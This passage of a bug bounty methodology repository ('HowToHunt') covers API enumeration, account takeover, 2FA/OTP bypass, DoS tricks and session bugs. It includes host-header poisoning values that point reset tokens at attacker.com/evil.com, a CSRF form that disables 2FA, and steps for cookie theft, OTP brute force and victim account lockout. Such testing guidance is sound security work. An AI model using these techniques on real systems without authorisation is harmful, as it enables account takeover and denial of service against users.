├── .all-contributorsrc
├── .github
    └── FUNDING.yml
├── API_Testing
    ├── Hidden_API_Functionality_Exposure.md
    └── Reverse_Engineer_an_API.md
├── Account_Takeovers_Methodologies
    └── Account_Takeovers_Methods.md
├── Application_Level_DoS
    ├── ALD_Methods.md
    └── Password.txt
├── Authentication_Bypass
    ├── 2FA_Bypasses.md
    ├── OTP_Bypass.md
    └── account_ban_bypass.md
├── BrokenLinkHijacking
    └── BrokenLinkHijacking.md
├── Broken_Auth_And_Session_Management
    └── Session_based_bugs.md
├── CMS
    ├── AEM.md
    ├── Drupal.md
    ├── Moodle.md
    └── wordpress.md
├── CODE_OF_CONDUCT.md
├── CONTRIBUTING.md
├── CORS
    ├── CORS.md
    └── CORS_Bypasses.md
├── CSRF
    ├── CSRF.md
    ├── Cross_Site_Request_Forgery_Bypass.md
    └── README.md
├── CVES
    └── easycve.md
├── CheckList
    ├── Web-Application-Pentesting-checklist.md
    ├── Web_Application_Penetration_Testing_Checklist_by_Tushar_Verma.pdf
    ├── Web_Checklist_by_Chintan_Gurjar.pdf
    ├── Web_Penetration_Testing_Methodology@2x.png
    └── mindmap.png
├── EXIF_Geo_Data_Not_Stripped
    └── exif_geo.md
├── File_Upload
    ├── file_upload.md
    └── old_file_upload_bypass.md
├── FindOriginIP
    └── FindOrigin.md
├── GraphQL
    └── GraphQL.md
├── HTML_Injection
    └── HTML_Injection_on_password_reset_page.md
├── HTTP_Desync
    └── http_desync.md
├── Host-Header
    └── Host-Header.md
├── IDOR
    ├── IDOR-Old.md
    └── IDOR.md
├── JIRA
    └── README.md
├── JWT
    ├── JWT.md
    └── OLD_JWT_ATTACK_Notes.md
├── LICENSE
├── MFA_Bypasses
    ├── 2FA_Bypass.md
    └── README.md
├── Misconfigurations
    ├── Default_Credential_And_Admin_Panel.md
    ├── Docker.md
    └── S3-Bucket_Misconfig.md
├── OAuth
    ├── OAuth 2.0 Hunting Methodology.md
    └── README.md
├── Open_Redirection
    ├── Open_Redirection_Bypass.md
    └── find_OpenRedirect_trick.md
├── Parameter_Pollution
    └── Parameter_Pollution_in_social_sharing_buttons.md
├── Password_Reset_Functionality
    ├── Account_Takeover_By_Password_Reset_Functionality.md
    ├── Password_Reset_Flaws_by_Sm4rty.md
    ├── Password_Reset_Token_Leakage.md
    ├── README.md
    └── Top_5_Password_Reset_Bugs
├── README.md
├── Race_Condition
    └── race_conditions.md
├── Rate_limit
    ├── No Rate-Limit on Verify-PhoneNo.md
    ├── No Rate-limit on Invite User.md
    ├── No Rate-limit on Promo.md
    ├── No Rate-limit on Verify-email.md
    ├── No Rate-limit on forget-password.md
    ├── README.md
    └── RateLimitBypass.md
├── Recon
    ├── Github_Dorking.md
    ├── Workflow.md
    └── subdomain_enumeration.md
├── SAML
    └── SAML.md
├── SQLi
    └── SQL_Injection.md
├── SSRF
    ├── Blind_SSRF.md
    ├── SSRF-old.md
    └── SSRF.md
├── SSTI
    └── SSTI.md
├── SUMMARY.md
├── Sensitive_Info_Leaks
    ├── Github-dorks.md
    ├── Github_Recon_Method.md
    ├── Github_dorks_all.md
    ├── Google_Dorks.md
    ├── Shodan_cve_dorks.md
    └── Version_Leak.md
├── Sign_Up_Functionality
    ├── Hunting_for_bugs_in_signup_feature.md
    └── Signup_Mindmap.png
├── Status_Code_Bypass
    ├── 403Bypass.md
    └── README.md
├── Subdomain_Takeover
    ├── Easy_Methods.md
    ├── Sub_or_top_level_domain_takeover.md
    ├── Subdomain_Takeover.md
    ├── cname.png
    ├── cname_buy.png
    ├── dns.png
    └── subdomain_takeover.png
├── Tabnabbing
    └── Tabnabbing.md
├── WAF_Bypasses
    └── WAF_Bypass_Using_headers.md
├── Weak_Password_Policy
    └── Weak_password_policy.md
├── Web_Source_Review
    └── codereviewtips.md
├── XSS
    ├── Automated_XSS.md
    ├── Bypass_CSP.md
    ├── XSS_Bypass.md
    ├── Xss.md
    └── post_message_xss.md
└── XXE
    ├── Billion_Laugh_Attack.md
    └── XXE_Methods.md


/.github/FUNDING.yml:
--------------------------------------------------------------------------------
 1 | # These are supported funding model platforms
 2 | 
 3 | github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
 4 | patreon: # Replace with a single Patreon username
 5 | open_collective: # Replace with a single Open Collective username
 6 | ko_fi: # Replace with a single Ko-fi username
 7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
 8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
 9 | liberapay: # Replace with a single Liberapay username
10 | issuehunt: # Replace with a single IssueHunt username
11 | otechie: # Replace with a single Otechie username
12 | custom: ['https://www.buymeacoffee.com/kathanp19']
13 | 


--------------------------------------------------------------------------------
/API_Testing/Hidden_API_Functionality_Exposure.md:
--------------------------------------------------------------------------------
 1 | # Hidden API Functionality Exposure
 2 | - Application programming interfaces (APIs) have become a critical part of almost every business. APIs are responsible for transferring information between systems within a company or to external companies. For example, when you log in to a website like Google or Facebook, an API processes your login credentials to verify they are correct.
 3 | 
 4 | 1. Swagger UI Documentation
 5 | 2. Dictionary Attack | Brute force
 6 | 3. Common wordlist for API Enum :
 7 | - https://wordlists.assetnote.io/
 8 | - https://github.com/Net-hunter121/API-Wordlist
 9 | 
10 | ## Steps to Perform This Attack :
11 | ```
12 | Step 1 : Capture the request into Burp, Send the request to repeater and intruder tab.
13 | Step 2 : Add the endpoint into the intruder tab and add the payload from the word-list.
14 | Step 3 : First use dictionary attack with SecLists (https://github.com/danielmiessler/SecLists) on the Endpoint.
15 | Step 4 : Either use your customized list or use the ones which I have provided in the above step.
16 | Step 5 : Then simply start the attack, start checking for 200 status.
17 | Step 7 : Once there is HTTP 200 OK status, start the recursive scan on the same endpoint for juicy information like swagger doc and so on.
18 | step 8 : Other method is to change the API version and try bruteforcing the same endpoint
19 | Eg: Redacted.com/api/v1/{Endpoint} ----- Redacted.com/api/v2/{Endpoint}
20 | ```
21 | * Note: There will be minimum limits per request which will be assigned without API keys so make sure to utilize manual approach as much as you can, then the rest can be automated for scanning the vulnerability in API with automated tools.
22 | 
23 | ## Contributor:
24 | - [N3T_hunt3r](https://twitter.com/N3T_hunt3r)
25 | 


--------------------------------------------------------------------------------
/API_Testing/Reverse_Engineer_an_API.md:
--------------------------------------------------------------------------------
 1 | # Reverse Engineer an API
 2 | <img src="https://pasteboard.co/n2094TfDB8qt.png">
 3 | 
 4 | ## Tools to use
 5 | 1. FoxyProxy
 6 | 2. mitmweb
 7 | 3. mitmproxy2swagger
 8 | 4. https://editor.swagger.io/
 9 | 5. Postman
10 | 
11 | ## Steps to Reproduce
12 | 1. **Foxyproxy:** Turn on 8080 port using Foxy Proxy.(Label it anything you want)
13 | 2. **mitmweb:** Run `sudo mitmweb` and then go to mitm.it and install & import the certificate.
14 | 3. **Explore Website w/ API's functionalities:** Go to the website w/ api that you want to gather the API endpoints from and explore it's functionalities. <br>The mitmweb tool will capture it,
15 | afterwards you can download the captures as a flow file in mitmweb by clicking on file -> save all.
16 | 4. **mitmproxy2swagger:** Here we run `sudo mitmproxy2swagger -i flows -o spec.yml -p <website api> -f flow`. This will turn flows file to a yml file. Afterwards you need to remove the ignore: in the spec.yml and run
17 | `sudo mitmproxy2swagger -i flows -o spec.yml -p <website api> -f flow --examples`, --examples is added to enhance the documentation of the api endpoints.
18 | 5. **https://editor.swagger.io/:** Now you can import the clean spec.yml file and visualize the different endpoints.
19 | 6. **Postman:** You can also import the spec.yml in postman which will produce a well organized collection.
20 | 


--------------------------------------------------------------------------------
/Account_Takeovers_Methodologies/Account_Takeovers_Methods.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## Chaining Session Hijacking with XSS
 3 | ```
 4 | 1.I have added a session hijacking method in broken authentication and session management. 
 5 | 2.If you find that on target.
 6 | 3.Try anyway to steal cookies on that target.
 7 | 4.Here I am saying look for xss .
 8 | 5.If you find xss you can steal the cookies of victim and using session hijacking you can takeover the account of victim.
 9 | ```
10 | ##  No Rate Limit On Login With Weak Password Policy
11 | ```
12 | So if you find that target have weak password policy, try to go for no rate limit attacks in poc shows by creating very weak password of your account.
13 | 
14 | (May or may not be accepted)
15 | ```
16 | ## Password Reset Poisioning Leads To Token Theft
17 | ```
18 | 1.Go to password reset funtion.
19 | 2.Enter email and intercept the request.
20 | 3.Change host header to some other host i.e,
21 |     Host:target.com
22 |     Host:attacker.com
23 |   also try to add some headers without changing host like
24 |     X-Forwarded-Host: evil.com
25 |     Referrer: https://evil.com
26 | 4.Forward this if you find that in next request attacker.com means you managed to successfully steal the token. :)
27 | ```
28 | ## Using  Auth Bypass
29 | ```
30 | Check out Auth Bypass method, there is a method for OTP bypass via response manipulation, this can leads to account takeovers.
31 | 1.Enter the wrong auth code / Password
32 | 2.Capture a auth request in burpsuite and send it to repeater 
33 | 3.Check for the resoponse
34 | 4.Change the respone by manipulating the following parameters
35 |   {“code”:”invalid_credentials”} -> {“code”:”valid_credentials”}
36 |   {“verify”:”false”}             -> {“verify”:”true”}
37 |   
38 |   
39 | ```
40 | ## Try For CSRF On
41 | ```
42 | 1.Change Password function.
43 | 2.Email change
44 | 3.Change Security Question
45 | ```
46 | ## Token Leaks In Response
47 | 
48 | * So there are multiple ways to do it but all are same.
49 | 
50 | * So I will sharing my method that I have learnt here .
51 | 
52 | * Endpoints:(Register,Forget Password)
53 | 
54 | * Steps(For Registration):
55 | ```
56 |   1. For registeration intercept the signup request that contains the data you have entered.
57 |   2. Click on action -> do -> intercept the response to this request.
58 |   3. Click forward.
59 |   4. Check response if that contains any link, any token or OTP.
60 |  ```
61 |  ------------------------
62 |  * Steps (For password reset):
63 |  ``` 
64 |   1. Intercept the forget password option.
65 |   2. Click on action -> do -> intercept the response to this request.
66 |   3. Click forward.
67 |   4. Check response if that contains any link,any token or OTP.
68 |  ```
69 | 
70 | ## Reference:
71 | * Various Source From Google,Twitter,Medium
72 | * https://avanishpathak.medium.com/an-account-takeover-vulnerability-due-to-response-manipulation-e23fe629bd1
73 | 
74 | ## Author
75 | * [@Virdoex_hunter](https://twitter.com/Virdoex_hunter)
76 | * [@v3daxt](https://twitter.com/v3daxt)
77 | 


--------------------------------------------------------------------------------
/Application_Level_DoS/ALD_Methods.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## 1. Email Bounce Issues
 3 | - Check if Application has Invite Functionality
 4 | - Try sending Invites to Invalid Email Accounts
 5 | - Try to find Email Service Provider such as AWS SES , Hubspot , Campaign Monitor
 6 | **Note:  You can find Email Service Provider by checking Email Headers**
 7 | * Once you have the Email Service Provider, Check there Hard Bounce Limits. Here are the limits for some of them:
 8 |   
 9 |   **1. Hubspot Hard bounces:** HubSpot's hard bounce limit is 5%. For reference, many ISPs prefer bounce rates to be under 2%.
10 |   
11 |   **2. AWS SES:** The rate of SES ranges from first 2-5% then 5-10%
12 | 
13 | ***Impact: Once the Hard Bounce Limits are reached, Email Service Provider will block the Company which means, No Emails would be sent to the Users !***
14 | 
15 | ## 2. Long Password DoS Attack
16 | 
17 | - As the value of password is hashed and then stored in Databases. If there is no limit on the length of the Password, it can lead to consumption of resources for Hashing the Long Password.
18 | 
19 | **How to test?**
20 | 
21 | - Use a Password of length around 150-200 words to check the presense of Length Restriction
22 | - If there is no Restriction, Choose a longer password and keep a eye on Response Time
23 | - Check if the Application Crashes for few seconds 
24 | 
25 | **Where to test?**
26 | 
27 | - Registration Password Field is usually restricted but the Length of Password on the Forgot Password Page and the Change Password (As Authenticated User) Functionality is usually missing.
28 | 
29 | 
30 | ## 3. Long String DOS
31 | 
32 | * When you set some string so long so server cannot process it anymore it cause DOS sometime
33 | 
34 | **How to test**
35 | ```
36 | Create app and put field like username or address or even profile picture name parameter ( second refrence ) like 1000 character of string . 
37 | Search A's account from B's account either it will
38 | ```
39 | - Either it will keeping on searching for long time
40 | - Either the application will crash (500 - Error Code)
41 | 
42 | 
43 | ## Use Password From Password.txt
44 | ⚠️`it's not recommended using more than 5000 characters as password.`
45 | - Here is the [Password.txt](https://raw.githubusercontent.com/KathanP19/HowToHunt/master/Application_Level_DoS/Password.txt)
46 | 
47 | ## 4. Permanent DOS to victim
48 | This is not Application Level DOS but a Permanent DOS to victim.
49 | In some website user get blocked after trying to loging in with wrong credidentials.We will untilize this feature as bug :D.
50 | 
51 | **How to check**.
52 | - Go to login page of example.com.
53 | - Now enter valid account email and wrong password .
54 | - Try to login with these details for few times(at least 10-20 times).You can use repeater or intruder in burpsuite.
55 | - If your account get blocked, check the blocking time period.If the blocking time period is more than 30 min .You can report it.
56 | 
57 | **Point to Remember**
58 | - Make sure there is no captcha during login because we cann't make any automated tool to loop the request.
59 | - Make sure Old session are expired after being blocked.
60 | 
61 | **What is priority of this bug?**
62 | - If the user get permanently block after some wrong attempts this is considered as P2. 
63 | - If the user get temporarly block this is considered as P3/P4.
64 | 
65 | During report try to add impact by saying that you can permanently block user account by looping this request with some intervals.
66 | 
67 | 
68 | ## Reference : 
69 | \- Email Bounce Issues
70 | * [https://medium.com/bugbountywriteup/an-unexpected-bounty-email-bounce-issues-b9f24a35eb68](https://medium.com/bugbountywriteup/an-unexpected-bounty-email-bounce-issues-b9f24a35eb68)
71 | 
72 | \- Long Password DoS Attack
73 | 
74 | - https://www.acunetix.com/vulnerabilities/web/long-password-denial-of-service/
75 | - https://hackerone.com/reports/738569
76 | - https://hackerone.com/reports/167351
77 | 
78 | \- Long String DOS
79 | - [https://medium.com/@shahjerry33/long-string-dos-6ba8ceab3aa0](https://medium.com/@shahjerry33/long-string-dos-6ba8ceab3aa0)
80 | - https://hackerone.com/reports/764434
81 | 
82 | \- Permanent DOS to victim
83 | - https://youtu.be/5drIMXCQuNw
84 | 
85 | ## Author: 
86 | * [Keshav Malik](https://twitter.com/g0t_rOoT_)
87 | * [Fani Malik](https://twitter.com/fanimalikhack)
88 | 
89 | 


--------------------------------------------------------------------------------
/Authentication_Bypass/2FA_Bypasses.md:
--------------------------------------------------------------------------------
  1 | # **2FA Bypass Techniques**
  2 | 
  3 | ## **Introduction**
  4 | Two-Factor Authentication (2FA) is a security mechanism designed to add an extra layer of protection by requiring users to provide an additional verification code after entering their credentials. However, improper implementations of 2FA can introduce various security flaws that allow attackers to bypass authentication.
  5 | 
  6 | This document outlines **common 2FA bypass techniques**, including **response manipulation, brute-force attacks, backup code abuse, and session hijacking**. Each method is detailed with examples and exploitation steps.
  7 | 
  8 | For a **visual reference**, a **[2FA Bypass Mindmap](https://mm.tt/1736437018?t=SEeZOmvt01)** provides an overview of different attack vectors.
  9 | 
 10 | ---
 11 | 
 12 | ## **Common 2FA Bypass Techniques**
 13 | 
 14 | ### **Index of Techniques**
 15 | | #  | **Technique** |
 16 | |----|--------------|
 17 | | **1**  | Response Manipulation |
 18 | | **2**  | Status Code Manipulation |
 19 | | **3**  | 2FA Code Leakage in Response |
 20 | | **4**  | JavaScript File Analysis |
 21 | | **5**  | 2FA Code Reusability |
 22 | | **6**  | Lack of Brute-Force Protection |
 23 | | **7**  | Missing 2FA Code Integrity Validation |
 24 | | **8**  | CSRF on 2FA Disabling |
 25 | | **9**  | Password Reset Disables 2FA |
 26 | | **10** | Backup Code Abuse |
 27 | | **11** | Clickjacking on 2FA Disabling Page |
 28 | | **12** | Enabling 2FA Without Expiring Active Sessions |
 29 | | **13** | Bypass 2FA with `null` or `000000` |
 30 | 
 31 | ---
 32 | 
 33 | ## **1. Response Manipulation**
 34 | Some 2FA implementations return a JSON response indicating whether authentication was successful. **Altering the response** can bypass restrictions.
 35 | 
 36 | ### **Exploitation**
 37 | - Intercept the response using **Burp Suite** or **a browser's developer tools**.
 38 | - Look for a response like:
 39 |   ```json
 40 |   { "success": false }
 41 |   ```
 42 | - Change it to:
 43 |   ```json
 44 |   { "success": true }
 45 |   ```
 46 | - If client-side validation is weak, access is granted.
 47 | 
 48 | ---
 49 | 
 50 | ## **2. Status Code Manipulation**
 51 | Some applications rely on HTTP status codes to determine authentication success.
 52 | 
 53 | ### **Exploitation**
 54 | - If a **4xx error** (e.g., `401 Unauthorized`) is received after entering a **wrong** 2FA code, modify the response to:
 55 |   ```
 56 |   HTTP/1.1 200 OK
 57 |   ```
 58 | - Some applications may grant access **even if authentication failed**.
 59 | 
 60 | ---
 61 | 
 62 | ## **3. 2FA Code Leakage in API Responses**
 63 | Some applications accidentally **leak the 2FA code** in their API response.
 64 | 
 65 | ### **Exploitation**
 66 | - Intercept the **request triggering the 2FA code**.
 67 | - Examine the API response.
 68 | - If the response contains:
 69 |   ```json
 70 |   { "otp": "123456" }
 71 |   ```
 72 |   - The attacker can directly **use the leaked OTP**.
 73 | 
 74 | ---
 75 | 
 76 | ## **4. JavaScript File Analysis**
 77 | Some applications store **2FA-related logic** in JavaScript files.
 78 | 
 79 | ### **Exploitation**
 80 | - Check for exposed `.js` files in the application.
 81 | - Look for sensitive **hardcoded values** like:
 82 |   ```javascript
 83 |   var otp = "123456";
 84 |   ```
 85 | - Attackers can **extract OTP verification logic** or **static OTPs**.
 86 | 
 87 | ---
 88 | 
 89 | ## **5. 2FA Code Reusability**
 90 | Some applications **do not expire OTPs after use**, allowing attackers to **reuse** them.
 91 | 
 92 | ### **Exploitation**
 93 | - Obtain a **valid OTP** from a previous session.
 94 | - Attempt to reuse the same OTP for authentication.
 95 | - If the system does not enforce **one-time use**, the **old OTP grants access**.
 96 | 
 97 | ---
 98 | 
 99 | ## **6. Lack of Brute-Force Protection**
100 | Applications that **do not limit OTP attempts** allow brute-forcing.
101 | 
102 | ### **Exploitation**
103 | - Identify the **number of OTP digits** (commonly `4`-`6`).
104 | - Use a tool like `Burp Intruder` to brute-force:
105 |   ```
106 |   000000 - 999999
107 |   ```
108 | - **Weak OTP validation** allows attackers to guess the correct OTP.
109 | 
110 | ---
111 | 
112 | ## **7. Missing 2FA Code Integrity Validation**
113 | Some systems accept **any valid OTP**, even from different accounts.
114 | 
115 | ### **Exploitation**
116 | - Obtain a **valid OTP** for **Account A**.
117 | - Use the **same OTP** to authenticate **Account B**.
118 | - If the system **does not verify OTP ownership**, access is granted.
119 | 
120 | ---
121 | 
122 | ## **8. CSRF on 2FA Disabling**
123 | Some applications **lack CSRF protection** when disabling 2FA.
124 | 
125 | ### **Exploitation**
126 | - Construct a **malicious request** to disable 2FA:
127 |   ```html
128 |   <form action="https://victim-site.com/disable-2fa" method="POST">
129 |       <input type="hidden" name="disable" value="true">
130 |       <input type="submit" value="Click to win a prize!">
131 |   </form>
132 |   ```
133 | - Trick the victim into **clicking the form**, disabling their 2FA.
134 | 
135 | ---
136 | 
137 | ## **9. Password Reset Disables 2FA**
138 | Some systems **disable 2FA** when a user resets their password.
139 | 
140 | ### **Exploitation**
141 | - If an account has 2FA enabled, attempt a **password reset**.
142 | - Check if **2FA is still active** after resetting the password.
143 | - If **2FA is disabled**, log in **without 2FA authentication**.
144 | 
145 | ---
146 | 
147 | ## **10. Backup Code Abuse**
148 | Backup codes provide **alternative login options** when OTP is unavailable.
149 | 
150 | ### **Exploitation**
151 | - If backup codes are stored **insecurely**, they can be leaked or stolen.
152 | - Some applications **do not expire backup codes after use**, allowing repeated exploitation.
153 | 
154 | ---
155 | 
156 | ## **11. Clickjacking on 2FA Disabling Page**
157 | Some applications allow **2FA to be disabled** without additional verification.
158 | 
159 | ### **Exploitation**
160 | - Load the **2FA disabling page** in an `<iframe>`.
161 | - Trick the victim into **clicking the iframe** (e.g., by overlaying it over an attractive button).
162 | - **2FA is disabled without the victim realizing it.**
163 | 
164 | ---
165 | 
166 | ## **12. Enabling 2FA Does Not Expire Active Sessions**
167 | In some applications, **enabling 2FA** does not log out active sessions.
168 | 
169 | ### **Exploitation**
170 | - If an attacker hijacks a **session before 2FA is enabled**, they **retain access** even after 2FA is enforced.
171 | - Attackers can **maintain persistence** despite 2FA protection.
172 | 
173 | ---
174 | 
175 | ## **13. Bypassing 2FA with `null` or `000000`**
176 | Some poorly implemented 2FA mechanisms accept **default or empty codes**.
177 | 
178 | ### **Exploitation**
179 | - Enter `null`, `000000`, or similar **default values** in the OTP field.
180 | - If the system **accepts these values**, authentication is bypassed.
181 | 
182 | ---
183 | 
184 | ## **Further Reading**
185 | - **[Testing Two-Factor Authentication](https://research.nccgroup.com/2021/06/10/testing-two-factor-authentication/)** by **NCC Group**
186 | 
187 | ---
188 | 
189 | ## **Authors**
190 | - **[Harsh Bothra](https://twitter.com/harshbothra_)**
191 | - **[Vishal Saini](https://twitter.com/k4k4r07)**
192 | 
193 | ---
194 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)*
195 | 


--------------------------------------------------------------------------------
/Authentication_Bypass/OTP_Bypass.md:
--------------------------------------------------------------------------------
  1 | # **OTP Bypass Techniques in Account Registration and Authentication**
  2 | 
  3 | ## **Introduction**
  4 | One-Time Passwords (OTP) are commonly used for authentication and verification in account registration, login, and critical actions. However, poor OTP implementations can lead to **authentication bypass, account takeover, and unauthorized access**.
  5 | 
  6 | This document outlines **various OTP bypass techniques**, including **response manipulation, rate limit exploitation, default OTP usage, and session validation flaws**.
  7 | 
  8 | ---
  9 | 
 10 | ## **OTP Bypass via Response Manipulation**
 11 | ### **Method 1: Manipulating OTP Verification Response**
 12 | #### **Steps:**
 13 | 1. Register an account with a mobile number and request an OTP.
 14 | 2. Enter an **incorrect OTP** and capture the request using **Burp Suite**.
 15 | 3. Intercept and **modify the server's response**:
 16 |    - Original response:
 17 |      ```json
 18 |      {"verificationStatus":false,"mobile":9072346577,"profileId":"84673832"}
 19 |      ```
 20 |    - Change to:
 21 |      ```json
 22 |      {"verificationStatus":true,"mobile":9072346577,"profileId":"84673832"}
 23 |      ```
 24 | 4. Forward the manipulated response.
 25 | 5. The system authenticates the account despite the incorrect OTP.
 26 | 
 27 | **Impact:**  
 28 | - **Full account takeover** without providing a valid OTP.
 29 | 
 30 | ---
 31 | 
 32 | ### **Method 2: Changing Error Response to Success**
 33 | #### **Steps:**
 34 | 1. Go to the **login page** and enter your phone number.
 35 | 2. When prompted for an OTP, enter an **incorrect OTP**.
 36 | 3. Capture the **server response**:
 37 |    ```json
 38 |    { "error": "Invalid OTP" }
 39 |    ```
 40 | 4. Modify it to:
 41 |    ```json
 42 |    { "success": "true" }
 43 |    ```
 44 | 5. Forward the response.
 45 | 6. If the server accepts this modification, you gain access without entering a valid OTP.
 46 | 
 47 | **Impact:**  
 48 | - **Authentication bypass leading to account takeover**.
 49 | 
 50 | ---
 51 | 
 52 | ### **Method 3: OTP Verification Across Multiple Accounts**
 53 | #### **Steps:**
 54 | 1. Register **two different accounts** with separate phone numbers.
 55 | 2. **Enter the correct OTP** for one account and intercept the request.
 56 | 3. Capture the server response and note **status:1** (success).
 57 | 4. Now, attempt to verify the second account with an **incorrect OTP**.
 58 | 5. Intercept the server response where the status is **status:0** (failure).
 59 | 6. Change **status:0** to **status:1** and forward the response.
 60 | 7. If successful, you bypass OTP authentication.
 61 | 
 62 | **Impact:**  
 63 | - **Bypassing OTP verification for multiple accounts**.
 64 | 
 65 | ---
 66 | 
 67 | ## **OTP Bypass Using Form Resubmission in Repeater**
 68 | #### **Steps:**
 69 | 1. Register an account using a **non-existent phone number**.
 70 | 2. Intercept the OTP request in **Burp Suite**.
 71 | 3. Send the request to **Repeater** and forward it.
 72 | 4. Modify the phone number in the request to **your real number**.
 73 | 5. If the system **sends the OTP to your real number**, use it to register under the **fake number**.
 74 | 
 75 | **Impact:**  
 76 | - **Unauthorized account registration using someone else's OTP**.
 77 | 
 78 | ---
 79 | 
 80 | ## **Bypassing OTP with No Rate Limiting**
 81 | ### **Steps:**
 82 | 1. **Create an account** and request an OTP.
 83 | 2. Enter an **incorrect OTP** and capture the request in Burp Suite.
 84 | 3. Send the request to **Burp Intruder** and **set a payload on the OTP field**.
 85 | 4. Set **payload type as numbers** (`000000` to `999999`).
 86 | 5. Start the attack.
 87 | 6. If **no rate limit** is enforced, the correct OTP will eventually match.
 88 | 
 89 | **Impact:**  
 90 | - **Complete OTP bypass through brute force**.
 91 | 
 92 | ---
 93 | 
 94 | ## **Additional OTP Bypass Test Cases**
 95 | ### **1. Default OTP Values**
 96 | - Some applications use default OTP values such as:
 97 |   ```
 98 |   111111, 123456, 000000
 99 |   ```
100 | - Test common default values to check for misconfigurations.
101 | 
102 | ### **2. OTP Leakage in Server Response**
103 | - Some applications leak OTPs in API responses.
104 | - **Intercept OTP request responses** and check if OTP is present.
105 | 
106 | ### **3. Checking if Old OTP is Still Valid**
107 | - Some systems allow the **reuse of old OTPs**.
108 | - Test if **previously used OTPs** are still accepted.
109 | 
110 | ---
111 | 
112 | ## **Rate Limiting Attack on OTP Verification**
113 | ### **Steps:**
114 | 1. **Navigate to the OTP verification endpoint**:
115 |    ```
116 |    https://abc.target.com/verify/phoneno
117 |    ```
118 | 2. Enter an **invalid OTP** (e.g., `000000`).
119 | 3. **Intercept the request** and send it to **Intruder**.
120 | 4. Set the **OTP field as the payload position**.
121 | 5. Use **payload type: numbers** and define a **range (000000 - 999999)**.
122 | 6. Start the attack.
123 | 7. Identify a **response length change**, which may indicate the correct OTP.
124 | 
125 | **Impact:**  
126 | - **Brute-force attack leading to OTP bypass and account takeover**.
127 | 
128 | ---
129 | 
130 | ## **Contributors**
131 | - **[@akshaykerkar13](https://twitter.com/akshaykerkar13)**
132 | - **[@Yn0tWhy](https://twitter.com/Yn0tWhy)**
133 | - **[@Virdoex_hunter](https://twitter.com/Virdoex_hunter)**
134 | - **[@febinrev](https://twitter.com/febinrev)**
135 | - **[@fani_malik](https://twitter.com/fanimalikhack)**
136 | - **[@v3daxt](https://twitter.com/v3daxt)**
137 | - **[@prakhar0x01](https://twitter.com/prakhar0x01)**
138 | 
139 | ---
140 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)*
141 | 


--------------------------------------------------------------------------------
/Authentication_Bypass/account_ban_bypass.md:
--------------------------------------------------------------------------------
1 | ### How to bypass account ban 
2 | 
3 | Steps:
4 | ```
5 | If you got ban from xyz.com  try to see other domain like forms etc where you need the same account to login.
6 | you maybe able to login from forms.xyz.com and its a bypass I found it on a hackerone private program.
7 | ```
8 | 


--------------------------------------------------------------------------------
/BrokenLinkHijacking/BrokenLinkHijacking.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## Steps
 3 | 
 4 | 1. Manually find and click external links on the target site ( For Example:- Some Links to Social Media Accounts or Some external Media Link)
 5 | 2. While Doing Manual work also put [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) in background using below Command interminal.
 6 | 
 7 |     `blc -rof --filter-level 3 https://example.com/`
 8 |     
 9 |    Ouput will be like Something. 
10 |    
11 |    `─BROKEN─ https://www.linkedin.com/company/ACME-inc-/ (HTTP_999)`
12 |    
13 |  3. Now you need to check if company has the page or not , if no then register as the company or try to get that username or url. 
14 |  
15 |  ## Alternate Step
16 |  1. Go to [Online Broken Link Checker](https://ahrefs.com/broken-link-checker), [Dead Link Checker](https://www.deadlinkchecker.com/) Or [Alternative Online Broken Link Checker](https://brokenlinkcheck.com/)
17 |  2. Input the domain name
18 | 
19 | ## Reference
20 | 
21 | * [https://edoverflow.com/2017/broken-link-hijacking/](https://edoverflow.com/2017/broken-link-hijacking/)
22 | * [https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d](https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d)
23 | 
24 | ### Author:
25 | * [@KathanP19](https://twitter.com/KathanP19)
26 | * [@cyph3r_asr](https://twitter.com/cyph3r_asr)
27 | * [@v3daxt](https://twitter.com/v3daxt)
28 | 


--------------------------------------------------------------------------------
/Broken_Auth_And_Session_Management/Session_based_bugs.md:
--------------------------------------------------------------------------------
  1 | # Broken Authentication And Session Management.
  2 | 
  3 | ### Old Session Does Not Expire After Password Change:
  4 | * Steps:
  5 | ```
  6 |       1.create An account On Your Target Site
  7 |       2.Login Into Two Browser With Same Account(Chrome, FireFox.You Can Use Incognito Mode As well) 
  8 |       3.Change You Password In Chrome, On Seccessfull Password Change Referesh Your Logged in Account In FireFox/Incognito Mode.
  9 |       4.If you'r still logged in Then This Is a Bug
 10 | ```      
 11 | 
 12 | ### Session Hijacking (Intended Behavior)
 13 | * Steps:
 14 | ```
 15 |     1.Create your account
 16 |     2.Login your account
 17 |     3.Use cookie editor extension in browser
 18 |     4.Copy all the target cookies
 19 |     5.Logout your account
 20 |     6.Paste that cookies in cookie editor extension
 21 |     7.Refresh page if you are logged in than this is a session hijacking
 22 | ```  
 23 | `Impact:` If attacker get cookies of victim it will leads to account takeover.
 24 |  
 25 |  
 26 | ### Password reset token does not expire (Insecure Configurability)
 27 | * Steps:
 28 | ```
 29 |       1.Create your account on target Site.
 30 |       2.request for a forget password token.
 31 |       3.Don't use that link
 32 |       4.Instead logged in with your old password and change your email to other.
 33 |       5.Now use that password link sents to old email and check if you are able to change your password if yes than there is the litle bug.
 34 |  ```    
 35 |  
 36 |  ### Server security misconfiguration -> Lack of security headers -> Cache control for a security page
 37 |  * Steps :
 38 |  ``` 
 39 |      1. Login to the application
 40 |      2. Navigate around the pages
 41 |      3. Logout
 42 |      4. Press (Alt+left-arrow) buttons
 43 |      5. If you are logged in or can view the pages navigated by the user. Then you found a bug.
 44 |   ```
 45 |   `Impact:` At a PC cafe, if a person was in a very important page with alot of details and logged out, then another person comes and clicks back (because he didnt close the browser) then data is exposed. User information leaked
 46 |  
 47 |  ### Broken Authentication To Email Verification Bypass (P4) :
 48 |   `category` : P4 >> Broken Authentication and Session Management >> Failure to Invalidate Session >> On Password Reset and/or Change
 49 | 
 50 | * Steps To Reproduce:
 51 | ``` 
 52 |     1)First You need to make a account & You will receive a Email verification link.
